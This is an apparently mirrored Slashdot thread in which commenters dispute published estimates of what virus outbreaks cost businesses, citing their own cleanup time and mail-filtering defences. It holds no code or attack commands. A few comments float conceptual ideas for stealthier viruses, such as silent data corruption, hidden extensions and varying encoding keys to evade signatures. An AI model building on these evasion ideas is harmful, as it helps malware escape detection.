Slashdot Mirror
How Much Do Computer Virus Attacks Really Cost?
An Anonymous Coward asks: "I'm presently doing a research project on the actual cost of computer viruses to companies within the U.S. Computer Economics, a research firm out of Carlsbad, California, has released statistics suggesting that virus attacks have cost U.S. businesses $17.1 Billion in 2000. That figure has gone on to be quoted in a number of other publications such as an article in Information Week magazine, but beyond a simple explanation, statistics aren't presented to back up this claim. How much have virus attacks cost you or your company?" To be honest with you, I too would like to see the mathematics behind this claim.
See http://language.perl.com/misc/virus.html.
I have yet to work in a place where that's really what would happen. In all my workplaces, people would have lost weeks of work, or maybe everything. And that's not even mentioning the idiot admin who refused to give me a restore because of some turf squabble with a rival.
But those things are not legitimately attributable to viruses. Those are attributable to hiring idiots for admins.
The rest of your post I agree with.
It's not enough to bash in heads, you've got to bash in minds. - Captain Hammer
Fah, I have a whole pile of systems that were deemed to be not Y2K compliant. Of all of them one required that the clock be reset, but only under Windows, it runs Linux just fine.
The rest of the world spent far less on their computer systems, and yet there lights stayed on. Y2K was a myth, for all intents and purposes. But it got rid of a lot of cruft, and it made a bunch of hardware and software companies very wealthy, so it wasn't all bad.
The chances of such a worm propagating are essentially nill. The trick worked in this one particular case because you happened to know exactly the software that your friend would be using. If your Applescript were sent to a Mac user that used some other email client it would have simply crashed. There simply aren't enough Mac Eudora users to sustain such a beast.
You tricked one guy (who you happened to know), but how many of the messages in his inbox were from Eudora using Mac addicts? And of those few who actually use the right type of software how many of them would open up any random jpeg from your buddy without poking at it a little first?
Microsoft is certainly responsible for creating software with such disregard for security. But it isn't the fact that all of the other email clients in the world are so much more secure that keeps their users from becoming targets, it is the fact that Windows + Outlook has the largest install base. There are scads of gullible Windows users, and there is a good chance that most of the addresses in a typical Windows User's address book are running the same sort of software.
There is still lost time. For example, the system administrators probably had something else they needed to be doing. In most of the organizations I have worked for the sysadmins don't just sit around all day playing quake and waiting for a fire. The lost time simply applies to all of the things that the sysadmin could have accomplished if he hadn't been cleaning up viruses. If your systems adminstrators are only busy when you have a virus, eliminating viruses would allow you to cut back on the amount of systems adminstrators that you hire.
Also, there is the fact that when a virus epidemic hits there are generally more than one system affected. Email servers are shut off, multiple workstations re-formatted and re-seeded. The largest expense of nearly any business is its payroll (in the US anyway). If a part of a company's workforce is unable to work at peak capacity it is squandering it's most costly resource. Viruses often affect entire departments, and can cost real money to a business.
The same virus could be written in ECMAScript, aka Javascript, aka JScript.
"When you get right down to it, it's really Intel's fault. Their CPUs will run any code, without giving any thought to security... "
Sorry, x86's since the 80286 have included multi-ring security. Too bad no one ever implemented anything with it...
sPh
"I consider a financial "loss" to be anything which I can claim on my taxes at the end of the year. Nothing else constitutes real loss.
Therefore things like software piracy, virus attacks, are not losses."
That's funny. My coworker and I, who are 100% scheduled from now through April 30th on an ERP implementation for a small manufacturing company, have spent the last three hours (and appear to have about 3 more to go, or a total of 12 manhours) working on the e-mail server because some idiot decided sending out Kourinokava.vbs files was funny (and yes, I know the users shouldn't have clicked on that). Now, that's 12 manhours down the drain. Plus, when I arrive at the manufacturing site tomorrow, I won't be prepared for the work I was going to do, and another 8 hours or so of everyone's time will be wasted as we try to work through that unprepardness.
Now, exactly how is that NOT a cost?
sPh
It's ironic that this story should appear on Slashdot just as Yet Another Visual Basic Virus spreads through the address books of everyone who uses that digital Petri dish of an e-mail program called Microsoft Outlook (or, based on the number of virii it spreads, perhaps it should be called Microsoft Outbreak instead).
The cost of virii is directly proportional to the stubbornness of both users and IT managers who refuse to get rid of programs like Outbreak which have repeatedly demonstrated this sort of problem, with no real remedy on the horizon. Infect me once, shame on you. Infect me twice, shame on me. Infect me three times, and I deserve to die because I'm not taking precautions!
--
Tired of FB/Google censorship? Visit UNCENSORED!
We're an MS Enterprise licensing customer - for our licensing fee (which isn't bad), we get the rights to any version of desktop Windows, and version of Office up to Professional, and all server/BackOffice CALs we need.
Outlook and Exchange come with the territory - it's be tougher for us to substitute a different mail system than the payback would justify.
Personally, I'd prefer a nice IMAP-based system that is less vulnerable to begin with, but if you manage the system carefully you can make the MS stuff work acceptably well - which is nice when you work at a company that's drank the Microsoft-branded Kool-Aid.
- -Josh Turiel
-- Josh Turiel
"2. Do not eat iPod Shuffle."
In 1998, a few months after I took the sysadmin job at my company, we had an infestation of the Class macro virus. It was a pain to clean up and deal with, but my staff and I took care of it in about a day - no data was lost.
.SHS and .VBS files. We have not had an infection of any sort since then - the antivirus portion of the gateway is updated with every update released (engines and definitions), and the clients are updated through management software that updates automatically as well - and the clients are locked into the most paranoid settings available.
After that, we put up an SMTP scanner/gateway between our Exchange server and the rest of the world. I set up filters to automatically block anything executable at all via e-mail, including stuff like
The downside is that I'm the "no fun" admin (since we block all the fun programs from e-mail), but on the other hand I've counted 26 copies of the "Kournikova" worm today alone that have bounced off our server harmlessly. I think it was worth it for sure. Since I'm stuck with Windows for the forseeable future, I'm happy with what I can do to prevent these from affecting us.
So our ongoing cost to really deal with viruses is $0. But I do have software costs (annual licenses), plus some time spent devising our strategy and implementing it. But that's part of the job - I can't really call it "virus costs".
- -Josh Turiel
-- Josh Turiel
"2. Do not eat iPod Shuffle."
Commercially available lengths usually start at 8 feet (96 inches) going up in length in multiples of 2 feet (24 inches).
A "stud" is usually 93 inches in length, which means that nailing them at right angles to a 1.5 inch thick bottom, or sole, plate and a 1.5 inch thick top plate results in an 8 foot wall. (In construction the question of when to say "foot" and when to say "feet" is answered "it depends")
If you remodel a house built in the early 1950's you'll find that the "2x4's" used back then are slightly wider and thicker (by either an eighth or a sixteenth of an inch, don't feel like going out in the rain to the shop to the woodbin with a tape measure just now) and the studs are shorter by double the thickness increase so that the wall is still 96 inches high.
Extrapolating back there was probably a time when 2x4's were 2 inches by 4 inches wide and thick (or thick and wide).
In the context of the original post, a 2x4 is a board that you can wrap your hands around and use to beat someone with or threaten to do so.
I see even classic Slashdot is now pretty much unusable on dial up anymore.
The difference is that the virus is more reliable, works with a wider range of hardware, requires fewer resources, and the author probably won't sue you for reverse engineering it if you can't find the source code.
I see even classic Slashdot is now pretty much unusable on dial up anymore.
The reason it is a boneheaded over-reaction as a response is that .vbs viruses are easily readable, and the exact nature and extent of their damage and the locations they are placed easily determined. VBS viruses are no more mysterious that a .sh 'virus' would be. Once you remove the responsible files and registry entries, there's no problem.
This is true, but completely tangential to what we were talking about: none of the things you describe are remediated by the measure of rebuilding a bunch of desktop machines out of the belief that "unknown" damage can't be repaired by more straightforward mechanisms. All the things you describe are true, but if they happened they would be made obvious by looking at the payload.
--
True. Fortunately, we're practically immune to VB scripts, since we block them at as many places as is feasible. Sadly, we can't really stop the flow of Word documents, but we disable macros, and so on.
"Real" viruses may have better luck getting in, but we're generally up to date with the updates.
As for Ghost, we'd use it (in fact, I've been pushing for it), but to get it done legit is expensive. Not a problem to me, but I don't always get the gear/utilities that I want because of price. Oh well.
Raptor
Raptor
"Procrastination is great. It gives me a lot more time to do things that I'm never going to do."
It's been said by others, and *yes* I know that this barely *cough*Redhat*cough* affects Linux users, but how many corporations use Linux for all their employees?
Under Windows, you do the following:
a) Install Norton on every machine
b) Pay for LiveUpdate
c) Set tight-fisted policy, so that anyone who breaks it realizes that it's their fault, and they *may* get bumped to the bottom of the queue
d) Use a mail server capable of decent filtering (procmail is excellent for this, and your unix box can relay to Exchange if you *really* need it)
e) Network profiles and user directories, with a solid backup rotation.
Of course, everyone here knew that, right?
I've dealt with this before. We've fixed it in a matter of minutes due to good policy, an extra box lying around, and a tight-fisted reign over the network.
Raptor
Raptor
"Procrastination is great. It gives me a lot more time to do things that I'm never going to do."
Most of our machines run Linux so does are automaticlly virus free. We also use MacOS and Windows which we keep updated with the latest virus scanners. Given that these updates are available for free online and can be automated the cost isn't much. Due to some problems with our old software working under Windows 2000 we've had to switch to Outlook for mail and I feel that may increase our problems but so far it's been nothing big. I'm considering setting up virus scanning at the mail server level (runs Linux) to take care of that problem but that takes very little effort. I'd say viruses cost maybe $100 in upkeep and monitoring a year.
At what price learning? At what cost wisdom? The price is a man's peace of mind, and the cost is his life.
We don't really have an accurate measure here. I know what the Love Bug cost ME, since I got to go and clean the little fucker off the dozen or so morons desks that opened it. During that whole time I got to listen to them bitch about how they had nothing to do. They weren't even able to catch the hint that they caused it themselves. Finally, we just told them that we could not have it fixed the same day, and told them to go home. After that we were able to finish the job quickly and easily.
From a pure production stand-point, we lost some $$ since we shut down the mail-swerver until we fixed it, but still, who knows? We lost a days worth of work for 12 people doing various production-related things, most of a day of my projects which have a direct impact on the entire company rather than a single dept., and we had no email for 6-8 hours which threw a kink into everyones communications. Hard to measure.
I did get some payback that day. Since we run an email-to-fax gateway, the 3-4 people who had a Contacts list full of fax addresses got to deal with a shit load of calls from irritated correspondants who were getting 10+ page faxes full of I Love You's code.
--
--
"Outlook not so good." That magic 8-ball knows everything! I'll ask about Exchange Server next.
But what happens when people start writing more insidious virues?
Say: flip a random bit in a random data file. Those bits add up over a few years, and even if you had two years' accumulated daily backup tapes, it would be nigh impossible to rebuild clean data from them. So what happens when you go to work one day, start troubleshooting a problem, and suddenly discover that you can't trust any of the data on any of your company's computers? And can't even confidently demonstrate which files are corrupt and which aren't?
Or: suppose someone uses a virus to cover a more sinister attack? The bank's IT staff congratulate themselves at how quickly they squashed a viral attack, not realizing that one of those messages had the same subject line and same
Other scenarios should be easy to come up with as well. The surprise is that the virus writers haven't come up with them yet. (Or haven't they?)
My point is: yes, headlines probably use grossly inflated figures for the cost of virus attacks, and yes, most of them could be shrugged off as annoying pranks. But will it always be that way? Rather than playing down the seriousness of viruses by pointing out cases of obvious or probable exaggeration, we should be trying to scare the bejesus out of our clients and employeers, before "the big one" comes along.
--
Sheesh, evil *and* a jerk. -- Jade
> What's interesting is how it decodes itself from the string.
I saw something recently about how the anti-virus companies are starting to whinge about how the number of different compression schemes available out there makes it really hard to create signatures for all the viruses. Same virus, different compression ==> different signature required.
--
Sheesh, evil *and* a jerk. -- Jade
While we're at it, can we get some independent academic research into other unquestioned numbers such as losses due to piracy?
These estimates get quoted in a couple articles, then stated in court and suddenly they're real and no one wants to question them.
A US "2x4" is a length of softwood building material nominally 2" by 4" in cross-section before planing, actually about 1-3/8" X 3-1/8" (3.5 cm X 6.25 cm approx.) after finishing.
A 2x4 is also at times known as a "clue stick."
No need to annoy the users to update their virus definition files... Norton AntiVirus will do that for you! I imagine McAfee, etc. can do this also.
And you can set up scheduled virus-scans in your Windows clients, make this part of the standard load image. My notebook Win2K client does it now.
Hovever, the general vulnerability of MS Windows software to viruses is a _great_ motivator for a company to look into using Linux on the desktops.
Give me an ever-better Wine to run MS Office apps, plus a Linux version of Lotus Notes, and SecureID SSL encryption ported to Linux, I won't use Win2K!
.. is to require the responsible parties to pay for them. By "responsible parties", I'm really referring to two groups of people. First and foremost are, of course, the authors and/or originators of the virus. Certainly, when they unleash a destructive virus on the computing community, they are culpable for much of the damage that is caused. The second group is one that doesn't get discussed a whole lot .. the users who spread the virus. Clearly, the brunt of the blame lies with the virus authors, but surely those "promiscuous" users who allow the virus to spread are partially at fault as well.
.. it's the fault of the person that served it to you. If you're daydreaming while walking and trip over a crack in somebody's sidewalk, it's not your fault .. it's the fault of the homeowner. And if you stupidly open an overtly suspicious attachment and unleash Dante's lowest level of Hell on your corporate intranet, it's not your fault, it's the script kiddie that wrote the virus!
This country (and, in many ways, the entire Western world) has been transformed into a place where there is no such thing as personal responsibility anymore. If you spill a cup of hot coffee on yourself, it's not your fault
I hereby call "bullshit" on this. People need to be taught a basic modicum of computer security common sense. Sure, the virus authors need to be held accountable, but if a virus or e-mail worm paralyzes a corporate intranet for a day and the point of injection can be determined, why not hold that user responsible as well, particularly if a virus alert has already been issued? I'll tell you what: a moron who blindly clicks on and opens every single attachment they get will think twice about it if they have to put a couple of month's worth of mortgage payments on their credit cards because half of their paycheck went to paying the tech support guys to clean up the mess they created.
Viruses can be thwarted so that their effect is minimal, but this is not going to happen so long as user stupidity is coddled and encouraged and users who do stupid things are allowed to claim that it's "not their fault." It's not their fault that the virus was created, of course, but it is their fault that they did a very stupid thing that cost a lot of people a lot of money. If you start making people pay for their mistakes, you'll find that they wind up making a hell of a lot less mistakes.
We're going down, in a spiral to the ground
But surreptitiously releasing a modified copy of "I Love You", we were able to determine with a high degree of accuracy which of our resources were, in fact, complete and total dipshits. After sending out a company wide email with the subject "WARNING: I Love You! DO NOT OPEN! VIRUS INSIDE!", many, many employees (mostly from legal and marketing) were immediately identified as being dipshits. We cut the fat, as it were, and are now a leaner, smarter organization better able to meet the challenges of the 21st century, sans dipshits.
The largest costs in the companies that I've seen are: software and meetings.
Software licensing costs for anti-virus software are huge for a medium-to-large business. Also, the time spent in "what do we, as a company do about virii" is non-trivial.
In the ideal company, anti-xxxx tactics (where xxxx is any sort of intrusion, theft, vandalism, etc) would be left to the people who do the job, but this is rarely the case.
Yeah, a couple of my friends here at work went to NDSU... Being as they have EE degrees, they probably saw a computer or two while they were there, though I don't think I could move that far north - leaving the tropics here (Rochester, MN) would be a harsh shock ;-)
Now about 'dem hossless carriges... 8^)
--
"It's tough to be bilingual when you get hit in the head."
Time is a finite resource that is closely linked to productivity. Productivity is linked to the completion of projects. When one's time is taken up by unscheduled workload (ie: the virus incident), current projects tend to suffer. That means the project either slips or more time has to be thrown at it. Where do you get that time? You hire more people to work the project, increasing the available manhours (time) and increasing the cost.
Whether these virus scares SHOULD cause such an impact on an organization's available time is an entirely different matter.
The announcement went out that no one should use email, I walked around a little bit later looking for my manager (he had asked me to look at the code to the script, find out what it does - not much anymore, other than waste resources, it turns out) - the office was near empty: Everyone went to lunch!
If that isn't lost money, I don't what is!
We use Windows (unfortunately) for a lot of our stuff, and most everybody uses Outlook - I use Netscape, and I consequently DON'T HAVE A PROBLEM (Netscape doesn't know what to do with the attachments). Also, I uninstalled Windows Scripting, so that nips it as well.
I have tried repeatedly to get the IS dept or anyone who would listen to switch to something else, filter VBS scripts at the server - something: All to no avail, so far...
Worldcom - Generation Duh!
Reason is the Path to God - Anon
The frightening thing to me - how the hell does McAfee get the data that makes up the map?
If I were running antivirus software, the last thing I'd want is to have it phoning home to tell some third party that I was infected.
Sounds like a privacy/security nightmare.
So how much of that loss is due to the virus and how much of it is actually due to the boneheaded over-reacting "fix" to the problem?
What's boneheaded about it? Can you think of a way requiring LESS down time to make SURE that the virus and anything it corrupted is removed from ANY computer at the company?
Starting a virus is like starting a fire - in this case one that burns through all the computers that are susceptable. After the fire is out the firemen are going to water the ashes and dig them up to make SURE it's out, and build firebreaks to keep it from relighting from the surrounding area (which may still be burning).
Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
You're assuming that $1 in the future is worth $1 today. In reality, the farther into the future you look, the less a dollar then is worth today.
No, I'm not. I explicitly took that into account with the "bank account" analogy for the time-difference in value of the money.
The cost in current dollars is the amount you have to put into the interest bearing account, in order to have the money to cover the shortfalls at the time they occur. Future withdrawals are a greater number of dollars then the initial deposit.
Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
We had one person get infected with the I Love You virus before we were aware of it and notified people not to open blah blah blah. It took a sysadmin 10 minutes to disinfect the affected computer.
Sysadmin salary/120,000 minutes worked per year*10 minutes= $4.16
That's our total loss. If you decide to count the amount of time spent learning about viruses, that means you count the amount of time we spend with Bugtraq every morning, which we would do anyway, so that's a wash.
Yeah, $4.16. That's about right.
Whenever I submitted a project to get funding based on 'productivity gains', they tell me that that 'productivity is an "intangible cost"', and therefore it cannot be used.
If that's so, then lost productivity because of a down 'down system' also is 'intangible', and therefore has no affect on 'cost'.
Hey, it's THEIR rules...
-- You can't idiot-proof anything, because they're always coming out with better idiots.
Actually, believe it or not, Symantec still does not have an update to detect this worm while most of their competitors have had protection since last August. Once again, Symantec is last. Our company killed incoming email several hours ago awaiting an update from Symantec.
This one is a harmless worm. Polite even. It even sets a registry flag so it won't run more than once.
Y'know, it'd be cheaper to just make everyone click it and not have to worry about reinfection than to spend money on a virus scanner. Or hell, less money on bandwidth spent by clicking it than downloading a new definition file.
.sig: Now legally binding!
If you have to run outlook, put outlook in the restricted zone. Set restricted zone to turn off, activex, javascript, java, etc.... Don't open attachments that look fishy. I've done these two things and have never gotten a virus (except for once when some other idiot ran an attachement which infected files on network server, and I got the file, but my virus checker caught that and cleaned it up).
---
DO NOT DISTURB THE SE
The people who care for the systems come and do a reinstall at $60 to $120 an hour. What's a typical system load for Windows (It was solid 8 hours for OS/2 back when I was doing onsite support.)
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Seriously though, you can quietly manage the whole thing. You don't have to have the whole company up in arms over it.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Many of the figures used in showing how much money businesses use are really off base. For example, take "cyber slacking", the term often used for employees using the Internet at work for fun, not business. They do some survey where they learn the average person says they spend 30 minutes of their work day "cyber slacking". Then they say the average person get paid $15/hour (or whatever) so that's $7.50 per worker per day. If there's 100 million workers, then business is loosing $750 MILLION DOLLARS A DAY!!!! Dumb. Anyway... I hope that's not too off topic but sometimes that's how business thinks. Perhaps with the virus thing they figure out how much their tech people who fix the stuff are paid and then add up the hours spent fixing virus-ridden systems, etc... What they don't take into account is that those tech guys are probably on salary and if they weren't fixing the virus problem, they'd be doing something else.... Like cyber slacking. :)
Macintosh humor! MacComedy.com
Well, since it's been obscufated, no it isn't very interesting ;-)
Anyone de-obscufed it?
~~~~~ BigLig2? You mean there's another one of me?
The real cost for a single instance of a virus is dealt with mostly costs in overtime for personnel while things are restored, inspected, and placed back into service.
The real cost overall is having to buy the software to protect against virii, and hiring the people that do nothing but guard the network. These costs don't contribute to the bottom, they merely protect it. This is the real cost of a good virus, it just usually isn't paid until someone catches something (when it should have been paid all along).
t
This just shows how anyone believes any numbers they read.
Like all other forms of crime, computer viruses actually make money for countless people.
From the products and salaries of virus companies, to cops salaries, to the salaries of reporters and other media, crime is great for absolutely everyone but a tiny irrelevant minority.
Take this personaility test.
Seth
$5 / month hosted VPS on linux = awesome!
But this doesn't follow. If there were no viruses at all, you wouldn't need to worry about them as a source of data problems, and you wouldn't need to spend the $24 per client for anti-virus software. What that means is that the threat of a virus alone is enough to force you to add costs, so there's a cost associated with viruses even for well run shops that don't actually get infected. It's not a direct cost, but it still exists.
There's no point in questioning authority if you aren't going to listen to the answers.
Odd that you should mention this. I did determine which one of my users opened it first. And while I didn't go to the extreme that you said of taking money from his pocket... I did send out a company-wide email jokingly pointing the finger at him (I called him a dead man).
A little public humiliation can go a long way. I will guarantee you that he'll think twice about opening attachments from now on.
Comment removed based on user account deletion
1 quarter to call someone who cares for each infected system.
According to the New McCafee Virus Map:
Luvbug.vbs infected
So, 10,000x$0.25 = $2500.00/day
Therefore - Today, Luvbug.vbs cost Americans $2,500.00 today...
I am become Troll, destroyer of threads
I read one Slashdot article about viruses (this one), and am responding to it. Cost: two minutes.
'Nuff said.
sulli
RTFJ.
About 4 or 5 years ago I wouldn't have agreed. I've lost a couple of disks to viruses. You could get some pretty nasty viruses if you knew where to look. Since the late 90's, with the Word Virus, and then these vbs viruses, You're pretty safe, and you're more likely to come to more harm installing things like McCaffe onto your windows computer (where do they get virus map data?).
Last year when ILOVEYOU hit I worked for #49 in the Fortune 100. In the aftermath, Management estimated we'd spent 2400 hours of employee time cleaning it up, not to mention our corporate email was down for 3 days.
When a 'worm' or other VBS mayhem is rampant:
$ 110 per billable hour (average) x 10 minutes per hour to wade through excess mail $ 11 dollars per end user per hour. x 15 end users $ 165 per hour + 30 bucks an hour for my services = 195 per hour.
That's when there is an active .VBS worm running loose. These prolems have seldom lasted longer than 2 hours - and that is due to the mail admins living on the West Coast and not being available as soon as the East Coast facilities are hit.
Otherwise, I'd guestimate that I spend at the most 2 work hours per week on virus and work related issues - that's average. Some weeks more, some weeks less, some weeks none at all.
Above figures are for a small part of a larger manufacturing concern.
Display some adaptability.
So how much of that loss is due to the virus and how much of it is actually due to the boneheaded over-reacting "fix" to the problem?
I agree. An intelligent user who is familiar with precautions against virii will probably never be infected. Out of the 10+ years that I've been using MS OS's, I've only ever had a virus once. And that was long ago when a roommate of mine was bring home disks from work and using them on my PC. If you take reasonable precautions, you will be safe.
Unfortunately, the number of people in the world who fit the description above is approximately 12. Most end-users are so pig-headedly stupid that they wouldn't know a virus if it were wearing a neon sign around it's neck. We actually had one user at my company that opened 7 different messages that had the subject "I love you" on the day of the Love Bug outbreak. And this was that afternoon, when a high priority alert had been sent out by out AV response team that morning!
People are stupid. In the work environment, we have to try to protect them from themselves. Once they leave the office though, they're on their own.
Well if software sites on a shelf and is not sold, it can become a write-off. The value of the write off is cost of production per unit.
....
A virus has a cost associated with it. Cost of productivity. Can we write it off. Hmmm software bought to prevent it happening again, extra copnsultants brought into the firm to upgrade systems
That the way i see it.
How the tax sytems work I don't know but I would not be surprised if some-one could claim it if there was enough proof and well documented claim.
example:
Traveling salesman that has full account of his time in a writen ( hand ) log. He/She could put computer down time as a loss of sales and presentation for the amount of days the system was down, proratedly only for the days the computer would be used based on a historical documentation of the hand writen log file.
there was a great acticle in forbes magazine about how to manage your records for the IRS. This included those people that were gamblers and other types of people that have to keep a written log.
ONEPOINT
spambait e-mail
my web site artistcorner.tv hip-hop music news
please help me make it better
if you see me, smile and say hello.
The original love letter virus cost millions in lost productivity, because it crashed thousands of (Exchange) mail servers. Also, I lose productivity everytime I reboot, because I have to wait for Norton Virus scan to download new patterns and scan my hard drive. Also, on an older system, the virus scanner interacted with Netware to crash Windows every time it tried to boot up, which cost me several hours of lost work until the IT department finally relented and told me the password to disable the virus scan function!
Interesting to note, however, that all these costs were incurred only on systems running MICROS~1 software... the more interesting question is "How does the cost of virii to Windows users compare to the cost of virii on non-windows users?"
Should buffer-overflow (stack smashing) and root exploits be included in the costs analysis? If not, it seems like the costs to Linux users is zero...
I think the costs are higher than corporations are willing to admit. I don't know about virus' specificly, but in "Information Warfare" by Winn Schwartau (I think I spelled his last name correctly) he talks about the damage bugs in general do to business. If they admited to the public that there were such problems, their stock integrity would drop drastically.
Total damage caused by virus: 1 million dollars Total money spent on people to access cost of virus damage: 16 million dollars.
-I fear the easter bunny.
I happened to see the O'Reilly book on VB Script this weekend, & was amazed to see their choice for the animal on the cover . . .
A flu virus?
The collophon claims this is a drawing of a Sea Urchin. I'm not convinced.
Geoff
I think I see a trend here. Maybe for them it really would be easier to muzzle the entire internet than to produce p
What complete tosh.
Let imagine there are no virii. So I don't need to buy the tools and expertise (not a one off cost as you have to employ extra people to cover you for the virus attacks). So thats the cost before you even talk about time.
Now in terms of time. The issue is quality time, the people who get hit aren't the bright ones, but the bright ones have to clean it up. So yes I've lost 2 hours of an average persons time, but worst of all I've just lost 1 x n hours of bright people. These people are NOT HAVING A BREAK they are WORKING ON A NON-BILLABLE TASK. Thus the cost is that every hour they work they could be billable.
Virii cost money, they cost time, and the immature people who write them should spend a little more time trying to develop decent software rather than being their own personal definition of "clever".
I'll be honest, I grade virus writers several layers below pond scum, the NSA and Barney.
An Eye for an Eye will make the whole world blind - Gandhi
No, it assumes they're doing it instead of regular work, where regular work is defined as not dealing with the virus. It's a matter of opportunity cost.
So, if you want a more realistic assessment, you must first take out duplicate entries on your balance sheet.
That's a joke, right? There are no duplicate entries when the person is doing Activity A instead of Activity B.
Then there's the cost of replacing data and software. Ummm, if you're doing regular backups (which you should), this'll be the cost of doing a restore from backup. Which is already factored into the system admin's pay, so (again) is a duplicate entry.
That a given activity is included in a person's job description is irrelevant unless that is the only activity in their job description. The only person who could possibly fall into this strange category you describe would be a "Virus Recovery Specialist" who is hired to do nothing but recover from viruses. But alas, that would put a definite, fixed monetary figure on virus treatment regardless of actual virus instances. Wouldn't the anti-virus software publishers love that!
Also, you're grossly simplifying the value of restoring from backup and the resulting lack of damage. How "regular" can your backups be before the backup processes interfere with getting the job done? And assuming you're not continuously backing up every keystroke (or other data input or manipulation) as it occurs, there will be data loss between the most recent backup and the time of restoration. Backups are important, but they're not a perfect, complete solution.
There are, of course, delays caused by all this activity. But if you look at the degree of variability in breaks, time in/out, fire drills, phone calls, meetings, etc, this "delay" is not significant in it's duration. It's a miniscule blip, made slightly larger by being all at once.
I wish that made sense even from a twisted perspective, but it doesn't. I keep hoping this is a joke, but I see it moderated as "Informative" which is a pretty scary thing to consider. Yes, delays in work exist due to phone calls, etc., but to imply that adding more delays has no impact is like saying 1 plus 1 equals 1.
And since these skills (such as system security) apply elsewhere in the business, it's a bad mistake to place the total cost under this one label.
At last, something I can agree with -- the total cost of the Sys Admin's salary shouldn't be attributed to virus recovery. I'm glad you put "total" in your statement, because otherwise we'd be right back to the apparently-facetious claim that adding labor does not add cost.
Generally speaking, I think virus cost estimates are unreliable eye candy for bored newspeople and anti-virus software vendors. Bigger numbers equal bigger revenue for them, whether through audience attention or software sales. They're eye candy to virus authors too, for that sense of "accomplishment." Actual costs are probably impossible to ascertain and are thus a worthless goal of analysis. It's like putting a specific dollar figure on the earthquake in India -- hey, does the exact damage really matter, or should we just do what we can to help the survivors recover?
No Laughing Allowed!
We've got a few thousand users in fifteen countries. If all infections were like todays spat of VBS/SST.Worm, it'd cost us more money to find the yearly cost than the cost itself.
But we do tend to get a nasty one about once a year. Win/CIH, ILUVYOU, etc. License costs of all the various scanners runs five figures. Planning, annoying the users to update their definition files, installing the software adds on cost as well.
Quick fudging says the actual expended cost per user, per year is under $25. (Probably closer to $18, but I'll go high to be safe) Now, if we assume there are 200 million computers in business use in the US, (Once again, high and safe) I only get $5 billion.
Either the rest of the companies out there are doing a bad job preparing for viruses and a bad job dealing with them, or the $12.1 figure was just pulled out of someones ass.
.sig: Now legally binding!
So, I guess you could call that a loss of 10 or 15 minutes of "productivity" for everyone in the company. Oh no, 10 man-hours lost! And at our billing rate...!
But frankly, not everyone was working anyway. There's at least as much time lost every day to reading online news and talking to friends, not to mention waiting for conference calls, etc etc. The impact was totally negligible, unless this virus had some nasty side effect of deleting all the files on someone's harddrive.
... poor software. I think windows should say on the box "insecure by default". Any network program that is designed for end users and not computer geeks should have safety built in. I can see a flaw slipping by the programmers that would allow a worm or security breach. I can't imagine selling a product that is so insecure that anyone with a little experiance can sit down and write a worm/virus/script to exploit, then never admit that the product was flawed.
Maybe these companies should be able to sue Microsoft, for lost time and money.
Environmentalists are their own worst enemy. ~tricklenews.com
Here's an example.
:-> )
Small company of 100 people, open 250 days/year.
Annual GROSS income $5 million.
$5m/250days/8hours = $2500/hr.
Virus comes in, hits 24 people.
Sysadmin can fix a machine in 15 minutes, making for six hours of work. That's $15000 in lost revenue!!! Then add on the salary for the sysadmin and the staff when they're not working, and you've got 12hr at $50/hr (average salary,
including the CEO, who makes $2million in stock options), or another $600. Wow, almost $16k for a small company!!! (interesting aside: $16000/24 people comes to $666/person
Now, let's look at this rationally. The sysadmin (a) can probably do several machines simultaneously, and (b) is already getting paid for this sort of thing. It's his job! Then there's the staff, who for their 15 minutes of downtime might take their allotted coffee break, or maybe even do some (gasp!) paperwork!
For non-destructive viruses, I would guess the average cost to be about $5/seat infected. A far cry from the $666/seat calculated above. Here are some of the flaws that lead to this discrepancy:
1) All work time is computer time for all staff infected.
2) Time spent repairing the damage is outside of normal duties for the admin.
3) All staff work at 100% efficiency all of the time.
4) Time spent repairing the damage can't be done when the staff aren't around.
In other words, the numbers quoted are nothing more than so much bullshit.
"People who do stupid things with hazardous materials often die." -- Jim Davidson on alt.folklore.urban
You figured it out. It adds the registry entry to know if the system has been infected before, then e-mails itself to everybody in your address list. If it is Jan 26th, it opens that web page. Yes, it's weird that it tries to open that web page in the past, but who knows (maybe the author released it in the wild back then, and only now hit corporate servers).
McAfee seems to detect it (I'm not sure if by heuristics or if it has the signature), but Norton AntiVirus doesn't detect it...
What's interesting is how it decodes itself from the string. I kind of remember a couple VBS virus doing that earlier.
It could be much worse. Many of these script viruses could be enhanced so the vbs extension doesn't show, and to use a variable encoding keys, which would make it harder to create signatures.
Any time you have an incident like this, go see the user personally with a pair of handcuffs and a 2x4. Gradually, as users become more enlightened about IS policy, you will see a decrease in these types of messages.
Hey, street crime wouldn't cost anything if people all stayed inside.
This Is pretty funny and related to the topic. It's a map of where virus'? viri? whatever... attack...
Basically A map of stupidity...
Is Your State Stupid?
Mostly I've been losing my freaking sanity from listening to my uber-geeky previous boss trying to "keep on top" of each virus. He does his own insightful analysis of the thing ("a-ha!this attachment is really a VB script!") He scours the web, digging up all the information that's readily available to anyone who wants to look for it, then spams the entire team for days on end with a torrent of "informative" e-mails that put the original virus to shame.
I bet you all have this same guy working in your office. Admit it, it's probably you.
omega_rob -- friend of the bonsai kitten
It's not all that complicated of a concept, why do you need it broken down for you? Some Linux users are so naive about the real world.
Ben Schumin :-)
Therefore things like software piracy, virus attacks, are not losses.
Why is it that Microsoft PR execs speak of the "billions of dollars lost because of piracy" yet the accoutanta don't report dollar one to the IRS or to the shareholders? I don't see MS claiming a loss when software sits unsold on a shelf in a warehouse. Yet have someone who can't afford nor ever would have paid for software to install Office or Windows on their machine and thay claim that's a $500 or $90 loss. Bullshit. Just like with movie theaters. Unsold empty seats are not a loss. But if kids sneak into those seats, all of a sudden it is, and a full fare loss too? Bullshit. Viruses cost time and are therefore a financial loss? Then MS must be responsible for loss when windows freezes up or crashes, right? Rules apply equally to everything or they mean squat.
If it's a loss, tell it to the IRS. Can't do that? Then shut up, because it's not a real loss.
The main element in any calculation of this kind is "time", which is usually calculated in terms of the amount the company/person would charge to do X number of hours work, for an outside agency.
This assumes, however, that the person is both sitting at their desk doing "regular" work, AND cleaning up the virus.
So, if you want a more realistic assessment, you must first take out duplicate entries on your balance sheet.
Then there's the cost of replacing data and software. Ummm, if you're doing regular backups (which you should), this'll be the cost of doing a restore from backup. Which is already factored into the system admin's pay, so (again) is a duplicate entry.
